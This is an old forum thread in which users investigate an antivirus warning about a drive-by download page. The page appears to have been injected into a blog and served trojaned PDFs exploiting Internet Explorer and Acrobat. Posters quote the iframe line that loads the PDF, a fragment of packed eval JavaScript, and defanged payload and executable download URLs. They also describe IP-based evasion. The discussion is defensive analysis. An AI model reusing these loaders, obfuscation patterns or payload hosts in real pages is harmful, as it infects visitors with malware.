dslreports logo
 
    All Forums Hot Topics Gallery
spc
Search similar:


uniqs
2640

Ender3rd
join:2001-07-15
Connecticut
·Frontier FiberOp..

Ender3rd

Member

Threat Detected: sitesupports.cn.kuzia.php


a.php
While browsing darkroastedblend(dot)com a friend of mine received a "threat detected" warning from "Web Shield". The inserted picture shows what he saw. I could find no information regarding "kuzia" or any details regarding the alleged JavaScript obfuscation. Does anyone know anything about what this is?

Thanks, Ender

Snowy
Lock him up!!!
Premium Member
join:2003-04-05
Kailua, HI

Snowy

Premium Member

I can't answer your question directly but in light of this similar thread
»Website owned? Or false positive?
can anyone say if this sort of thing could be mitigated by placing the entire .cn domain in the host file?

Ender3rd
join:2001-07-15
Connecticut
·Frontier FiberOp..

Ender3rd

Member

Thanks for the response. That was quite an interesting thread.

No doubt editing the hosts file would prevent any unwanted offsite image fills from *.cn or the execution of offsite scripts, but in this case the sitesupports(dot)cn website appears to be an "Apache HTTP Server Test Page" which seems unremarkable and without scripts of any kind. The only embedded links are to apache(dot)org and centos(dot)org and one informational link to internic(dot)net. Seems weird that his "Web Shield" protection freaked out over that.

In viewing the source I could not find anything embedded on the darkroastedblend site that looked threatening, but I am certainly not a security expert. Then again, I don't browse with IE or with javascript enabled or with active x enabled...

:O)
Ender3rd

Ender3rd to Snowy

Member

to Snowy
said by Snowy:

can anyone say if this sort of thing could be mitigated by placing the entire .cn domain in the host file?
I looked into your idea of blocking a top level domain with the hosts file and found that the hosts file will not accept wildcards. From what I read, it can be handled at the DNS level, but I could find no easy method for dealing with this as an end user. Does anyone have any suggestions? I would not miss .cn at all if I could block it here.

VikingBob
Go Jets Go!
Premium Member
join:2004-06-05
MB Canada

VikingBob

Premium Member

OpenDNS will block TLDs. You have to sign up, though. In the settings, add ".cn" (without quotes) in the domains to block list. No * for a wildcard needed.
bobince
join:2002-04-19
DE

3 edits

bobince to Ender3rd

Member

to Ender3rd
sitesupports.cn certainly does contain exploit code. The root URL may be a default placeholder page, but the URL AVG complained about (/kuzia.php) does try to launch a trojaned PDF:

document.write('<iframe src="cache/readme.pdf"></iframe>');
 

(it also attempts to load a Flash file, but that's not present on the server, currently.)

I couldn't find any link to this attack on darkroastedblend.com. Either it's been fixed for now, or it doesn't always show up, or the compromise was in a random advert shown by one of the site's ad networks.

As for blocking .cn, it may help as a temporary measure if you're sure you'll never need to look at any Chinese sites. it's far from watertight of course; in particular many of the current round of Chinese sploits are being referenced by direct IP address instead of hostname.
mysec
Premium Member
join:2005-11-29

1 edit

1 recommendation

mysec

Premium Member

Very interesting site to study. Different things happen depending on the browser.

Using IE6 unpatched on Win2K, several exploits attempt to run, including MS06-014 (MDAC):




Kaspersky identifies load.exe as Trojan.Win32.Inject.rlh.

Also MS08-041 (Snapshot Viewer) but I don't have MSAccess installed, so the exploit attempts to find my Office Setup Disk and use an installer (msi*.tmp):




Note that these are old exploits already patched, yet must still be effective or they wouldn't continue be used.

Some of the obfuscated page code. The first 'setAttribute' is for the MS06-014 exploit, and the 'snapshot' code is below.




That code did not load when I accessed the page using Opera.

According to some analysts, garbling the code makes it more difficult for AV to identify the page as malware code.

The PDF file exploit would not execute on my old version 6 of Acrobat Reader. The file is identified by Sophos as

Troj/PDFJs-L
Type: Trojan

Another "feature" of this site is the evasive techniques used to avoid multiple connections to the site by the same IP address.

The second time I connected brought up a blank page with this code:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; 
charset=windows-1251"></HEAD>
<BODY></BODY></HTML>
 



This technique was analyzed a couple of years ago in this article:

Report Reveals New Genre of Evasive Attacks
»www.finjan.com/Pressrele ··· 30&lan=3
In order to minimize the malicious code's window of exposure, evasive attacks keep track of the actual IP addresses of visitors to a particular website or web page. Using this information, the attackers restrict exposure to the malicious code to a single view from each unique IP address. This means that the second time a given IP address tries to access the malicious page, a benign page will be automatically displayed in its place. All traces of the initial malicious page completely disappear.

"Evasive attack techniques where malicious code is controlled per IP address, country of origin or number of visits provide hackers with the ability to minimize the malicious code’s exposure, thereby reducing the likelihood of detection. Moreover, evasive attacks can identify the IP addresses of crawlers used by URL filtering, reputation services and search engines, replying to these engines with legitimate content and increasing the chances of mistakenly being classified by them as a legitimate category," said Yuval Ben-Itzhak, CTO, Finjan. "The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected."

Hacking for Dollar$ - The Financial Affiliations Behind Modern Website Attacks

Driven by strong financial incentives and using widely available malicious code software packages, "affiliations" are being created that promote infections using a "hosted" model for the malicious code.

This applies to the current exploit:
In this scheme, the malicious code is usually located on a dedicated malicious code server (or a site that has been hacked to host the malicious code), [sitesupports.cn.kuzia]

while the participants in the affiliation insert a reference to the malicious code in various websites. [darkroastedblend.com]
[my insertions]
The website owners are paid according to the number of infected visitors to the site. Finjan’s findings attest to the growing magnitude of these affiliation networks, which have been used to compromise highly popular websites and even government domains.

This was written in 2007. Not much has changed!

EDIT: correct a statement

----
rich

therube
join:2004-11-11
Randallstown, MD

4 edits

therube to Snowy

Member

to Snowy
Similar indeed. Look what Metabolic posted:
quote:
Hi, today i met with this page and i suggest there is two file. One use an Adobe Acrobat reader bug to install malware to the computer the other is a Flash virus
This is the pdf:
hxxp://liteautorepair.cn/cache/readme.pdf
This is the swf:
hxxp://liteautorepair.cn/cache/flash.swf

The page checks that witch plugin is installed ...

Different domains doing the hosting, but the same (named) payload.

(At the least) readme.pdf from liteautorepair is still available. Contains JavaScript code.
/JS (eval\(function\(p,a,c,k,e,d\){e=function\(c\){return\(c<a?'':e\(parseInt\(c/a\)\)\)+\(\(c=c%a\)>35?String.fromCharCode\(c+29\):c.toString\(36\)\)} ...
 
Points to MCRC Blog - 2009 - PACKED - The Elegant way to serve malware (which may have been linked in another thread here, or at least I remember the name finjan).

(LOL. It was this thread that I read "finjan". Like mysec's post above.)

(The kuzia pdf/swf files were not available to me. Either not there or being [IP?] blocked?)

Also worth review the first linked thread including bobince's replies.

Also good IMO that at least some A/V's (AVG in the first instance) are pointing out potential problems with sites containing malware.
bobince
join:2002-04-19
DE

bobince to mysec

Member

to mysec
quote:
"document.write" is not supported by non-IE browsers.
On the contrary, it's an original JavaScript 1.0 feature, going back to Netscape 2.0 days and supported everywhere.

The page does use browser-sniffing (very common these days), but the version I got was targeted at ‘other browsers’ via plugins.

Ender3rd
join:2001-07-15
Connecticut
·Frontier FiberOp..

Ender3rd

Member

I appreciate all the information given in the thread. Would it be fair to say that [darkroastedblend] was a willing partner in this exploit, or is it more likely that they were the victim of an exploit that linked them to the sitesupports.cn scripts?

Also, when I view [sitesupports.cn] all I see is an "Apache 2 Test Page" that appears to be devoid of any script language in the source. I see no page at all if I append that with kuzia.php (viewing with firefox - scripts disabled) so is it fair to say that this particular exploit has been removed?

Thanks,

Ender
Expand your moderator at work
mysec
Premium Member
join:2005-11-29

mysec to bobince

Premium Member

to bobince

Re: Threat Detected: sitesupports.cn.kuzia.php

said by bobince:

quote:
"document.write" is not supported by non-IE browsers.
On the contrary, it's an original JavaScript 1.0 feature, going back to Netscape 2.0 days and supported everywhere.

Thanks for the correction. I noticed my mistake last evening in another thread when I got the download using Opera, and intended to correct it here, which I just did.

----
rich
mysec

mysec to Ender3rd

Premium Member

to Ender3rd
said by Ender3rd:

I appreciate all the information given in the thread. Would it be fair to say that [darkroastedblend] was a willing partner in this exploit, or is it more likely that they were the victim of an exploit that linked them to the sitesupports.cn scripts?

Probably the latter, since bobince See Profile noted that the script has been removed.
Also, when I view [sitesupports.cn] all I see is an "Apache 2 Test Page" that appears to be devoid of any script language in the source. I see no page at all if I append that with kuzia.php (viewing with firefox - scripts disabled) so is it fair to say that this particular exploit has been removed?

Remember to disconnect/reconnect between tries.

The page with .../kuzia.php still loads here in both Opera and IE6, with differences in the code as I noted previously.

----
rich

therube
join:2004-11-11
Randallstown, MD

therube to Ender3rd

Member

to Ender3rd
quote:
when I view [sitesupports.cn] all I see is an "Apache 2 Test Page"
Correct. Cause in all likelihood that is all that is there.

Now if you were to use h-ttp://sitesupports.cn/kuzia.php/, you would see the exploit page (at least the start of, & assuming your IP hasn't been blocked).

Wonder if view-source: (in Mozilla browsers) would avoid the IP block?
view-source:http://sitesupports.cn/kuzia.php/
 
mvdu
Premium Member
join:2003-07-28
Collegeville, PA

mvdu to Ender3rd

Premium Member

to Ender3rd
I just get a blank page when I go there now, with AntiVir not alerting. Only the first time I went to hxxp://sitesupports.cn/kuzia.php/ did I get the exploit page that AntiVir alerted on.

Ender3rd
join:2001-07-15
Connecticut

Ender3rd to mysec

Member

to mysec
Thanks again for the patient analysis. This was the first time I have seen a disappearing exploit after an initial page load. Very clever and evasive indeed.

Regards,

Ender

Marrach
@verizon.net

Marrach to Ender3rd

Anon

to Ender3rd
Just a little extra info-- for Firefox 2x Users-- You may find that Firefox may have had a configuration file rewritten by this website/trojan. I only noticed if After my Kaspersky woke up and blocked the download attempt of the actual Trojan, but Firefox had already been hijacked to attempt the download when it restarted. By then, Kaspersky blocked it-- but the browser kept trying to download.

So when I tried to close Firefox, I got a window asking if I wanted to "Cancel a Download"-- but I never saw the download window in the first place, and when I opened the Download window it was empty-- Firefox was trying a download the file-- and has been instructed NOT to let you see it. You've got to get rid of a file in the Configuration that instructs Firefox to tap into sitesupports.cn when you start it up.

I got rid of it by overwriting the Application Data files for Mozilla in "Documents and Settings". Sorry I don't know which one it was. I just overwrote from my last Clean Ghost.

I don't know if the same thing can happen with FireFox 3x. That's my 2 cents.
mysec
Premium Member
join:2005-11-29

mysec to therube

Premium Member

to therube
said by therube:

Similar indeed. Look what Metabolic posted:
quote:
This is the pdf:
hxxp://liteautorepair.cn/cache/readme.pdf

Different domains doing the hosting, but the same (named) payload.

But the PDF files are different:

sitesupports.cn
MD5: 334a732f5d026b20eb24b860b3723833
FileSize: 9k
Sophos: Troj/PDFJs-L

Opening in Acrobat Reader:




liteautorepair.cn
MD5: d085506ba97322a0896580eb5a7beefb
FileSize: 16k
BitDefender: Exploit.PDF-JS.Gen

Opening in Acrobat Reader:




The PDF-JS trojans have been around awhile. Here is an analysis of an early one:

Analyzing a malicious pdf - Troj/PDFJs-A
»realsecurity.wordpress.c ··· pdfjs-a/
Now that we have the shellcode we can very easily find out what it's doing.
We now have a .exe as output.
hxxp://aolpound.com/z9QCkGo7/exe.php

I don't know which versions and which vulnerabilites in the Acrobat Reader these PDF files exploit, but I did not get an alert to a download, as I did from the IE exploits as shown in a previous post.

Nonetheless, I've never believed that an application should be depended upon to be a defense against malware executables, and that some type of execution prevention should be in place just in case.

Is your browser configured to open documents on the web in the browser? This can present a problem with remote code execution exploits, such as this.

I posted these screenshots in another thread, but are applicable here.

If configured to open in the browser, as I have with IE6, the PDF file will load into the i-frame and run. This code is still active. No click required:

document.write('<iframe src="cache/readme.pdf"></iframe>'); 
 




In Opera I configure to prompt for a download:







In my view, this is the way that documents on the web should be treated. This way, the user is alerted if encountering something she/he didn't go looking for, rather than getting an automatic download.

----
rich